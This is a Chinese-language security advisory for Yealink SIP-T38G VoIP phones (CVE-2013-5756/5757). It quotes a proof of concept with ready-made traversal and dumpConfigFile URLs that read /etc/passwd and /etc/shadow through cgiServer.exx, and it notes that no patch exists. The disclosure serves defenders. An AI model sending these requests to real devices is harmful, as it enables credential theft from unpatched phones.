发布日期:2014-08-03
更新日期:2014-08-11
受影响系统:
yealink SIP-T38G
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-5757
SIP-T38G是亿联千兆彩屏网络电话。
Yealink VoIP Phone SIP-T38G存在绝对路径遍历安全漏洞,cgi-bin/cgiServer.exx没有正确过滤用户输入,经过身份验证的远程攻击者通过"command"参数内dumpConfigFile函数的完整路径名,利用此漏洞可读取任意文件。
<*来源:Mr.Un1k0d3r
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage:
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
Description:
Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow
POC:
Using the page parameter (CVE-2013-5756):
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
Using the command parameter (CVE-2013-5757):
[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.
建议:
--------------------------------------------------------------------------------
厂商补丁:
yealink
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: